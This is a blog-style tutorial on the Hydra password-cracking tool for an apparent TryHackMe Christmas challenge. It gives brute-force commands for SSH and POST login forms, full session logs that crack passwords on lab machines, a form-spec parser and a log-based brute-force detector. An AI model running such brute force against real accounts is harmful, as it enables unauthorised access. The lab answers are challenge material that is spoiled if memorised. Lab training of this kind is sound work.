CatSec.org

What is Hydra?

Hydra is an online brute-force password cracking program; a quick tool for 'hacking' system login passwords.

We can use Hydra to run through a list and 'bruteforce' some authentication service. Imagine trying to manually guess someone's password on a particular service (SSH, a web application form, FTP or SNMP) - Hydra runs through a password list for us and speeds this process up, determining the correct password.

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220

This shows the importance of using a strong password: if your password is common, doesn't contain special characters and/or is not above 8 characters, it's going to be prone to being guessed. Password lists of 100 million common passwords exist, so when an out-of-the-box application uses an easy password to log in, make sure to change it from the default! CCTV cameras and web frameworks often use admin:password as the default credentials, which is obviously not strong enough.

Installing Hydra

If you're using Kali Linux, Hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra

If you don't have Linux or the right desktop environment, you can deploy your own Kali Linux machine with all the needed security tools. You can even control the machine in your browser! Do this with our Kali room - https://tryhackme.com/room/kali


Using Hydra

The options we pass into Hydra depend on which service (protocol) we're attacking. For example, if we wanted to bruteforce FTP with the username user and the password list passlist.txt, we'd use the following command:

hydra -l user -P passlist.txt ftp://192.168.0.1

For the purpose of the Christmas challenge, here are the commands to use Hydra on SSH and a web form (POST method).

SSH

hydra -l <username> -P <full path to pass> <ip> -t 4 ssh

Option    Description
-l        the (single) username
-P        use a list of passwords
-t        the number of threads (parallel tasks) to use

Post Web Form

We can use Hydra to bruteforce web forms too, but you will have to make sure you know which type of request the form is making - the GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request type, or simply view the page source.

Below is an example Hydra command to brute force a POST login form.

hydra -l <username> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -V

Option            Description
-l                single username
-P                use the following password list
http-post-form    the type of form (POST)
/<login url>      the login page URL
username=         the form field where the username is entered
^USER^            tells Hydra to substitute the username here
password=         the form field where the password is entered
^PASS^            tells Hydra to substitute each password from the list supplied earlier
Login failed      an alternative failure string, for a form that returns "Login failed" instead of "incorrect" on a bad login
F=incorrect       if this word appears in the response page, the attempt was incorrect
-V                verbose output for every attempt
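The http-post-form string is three colon-separated parts: the login path, the body template with its ^USER^ and ^PASS^ placeholders, and the failure (F=) or success (S=) condition. As an added example (not code from this page or from the Hydra project), here is a small Python parser that pulls those parts out of such a string, substitutes the placeholders and judges a response the way the condition describes; the response texts it is fed are constructed.

```python
import re
from urllib.parse import parse_qsl

# Added example (not from the page or the hydra project): a parser for the
# "<path>:<body>:<condition>" string the http-post-form module takes.
USER, PASS = "^USER^", "^PASS^"

def parse_http_post_form(spec):
    """Split a hydra http-post-form spec into path, body template and condition.

    Unescaped colons separate the parts (a colon written as '\\:' is literal).
    The condition is 'F=<text>' (text present => failed attempt) or
    'S=<text>' (text present => successful attempt); a bare string such as
    'Login failed' counts as a failure marker, which is hydra's default.
    """
    parts = [p.replace("\\:", ":") for p in re.split(r"(?<!\\):", spec)]
    if len(parts) < 3:
        raise ValueError("expected <path>:<body>:<condition>")
    path, body, cond = parts[:3]
    if cond.startswith(("S=", "F=")):
        kind, text = cond[0], cond[2:]
    else:
        kind, text = "F", cond
    if USER not in body or PASS not in body:
        raise ValueError("body must contain both ^USER^ and ^PASS^")
    return {
        "path": path,
        "body": body,
        "condition": (kind, text),
        # decoded field names, e.g. ctl00%24MainContent... -> ctl00$MainContent...
        "fields": parse_qsl(body, keep_blank_values=True),
    }

def fill_template(body, user, password):
    """Substitute the placeholders as hydra does: raw text, no URL-encoding."""
    return body.replace(USER, user).replace(PASS, password)

def attempt_succeeded(condition, response_body):
    """Apply the F=/S= rule to a response body (constructed in the demo below)."""
    kind, text = condition
    present = text in response_body
    return present if kind == "S" else not present

if __name__ == "__main__":
    spec = "/login:username=^USER^&password=^PASS^:F=incorrect"
    parsed = parse_http_post_form(spec)
    print(parsed["path"], parsed["condition"])
    print(fill_template(parsed["body"], "molly", "sunshine"))
    print(attempt_succeeded(parsed["condition"], "Username or password incorrect"))
```

Feeding it the ASP.NET form string from the last session on this page shows why the field names there are percent-encoded: the decoded names contain `$`, which the shell would otherwise expand.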

You should now have enough information to put this into practice and complete the Hydra Christmas challenge!

Start Hacking

catsec@catsec:~/thm# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.183.73 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-02 04:59:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.183.73:80//login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "michael" - 18 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "ashley" - 19 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "qwerty" - 20 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "111111" - 21 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "iloveu" - 22 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "000000" - 23 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "michelle" - 24 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "tigger" - 25 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "sunshine" - 26 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "chocolate" - 27 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "password1" - 28 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "soccer" - 29 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "anthony" - 30 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "friends" - 31 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "butterfly" - 32 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "purple" - 33 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "angel" - 34 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "jordan" - 35 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "liverpool" - 36 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "justin" - 37 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "loveme" - 38 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "123123" - 40 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "football" - 41 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "secret" - 42 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "andrea" - 43 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "carlos" - 44 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "jennifer" - 45 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "joshua" - 46 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.183.73 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.183.73   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-02 04:59:53

Use Hydra to bruteforce molly’s web password. What is flag 1?
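From the defender's side, the session above shows up on the web server as a burst of POSTs to /login from one address, all answered with 200 because the form reports failure in the page body rather than in the status code. As an added example (not from the page), the following Python checks access-log lines for that pattern; the log lines, IP addresses, timestamps and threshold are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example: spot a login-form brute force in web server access logs.
# The log lines, IPs and timestamps below are constructed, not from the page.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format access-log line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_login_bursts(lines, login_path="/login", threshold=10, window_s=10):
    """Return {ip: first_timestamp} for each source that POSTs to login_path
    at least `threshold` times inside any `window_s`-second window. Status
    codes are ignored on purpose: a form answering 200 with 'incorrect' in
    the body (the F=incorrect case above) never yields a 401/403 to count."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != login_path:
            continue
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        while (rec["ts"] - window[0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold and rec["ip"] not in flagged:
            flagged[rec["ip"]] = window[0]
    return flagged

def sample_log():
    """Constructed lines: one normal visitor, then a burst shaped like hydra's 16 tasks."""
    fmt = ('{ip} - - [02/Jun/2020:04:59:{s:02d} +0000] "{m} {p} HTTP/1.1" '
           '200 512 "-" "Mozilla/5.0"')
    lines = [fmt.format(ip="10.0.0.7", s=40, m="GET", p="/login"),
             fmt.format(ip="10.0.0.7", s=44, m="POST", p="/login")]
    lines += [fmt.format(ip="10.0.0.5", s=46 + i // 8, m="POST", p="/login")
              for i in range(16)]
    return lines
```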

catsec@catsec:~/thm# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.183.73 -t 4 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-02 05:16:34
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.183.73:22/
[22][ssh] host: 10.10.183.73 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-02 05:17:07

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39
[80][http-post-form] host: 10.10.140.111 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52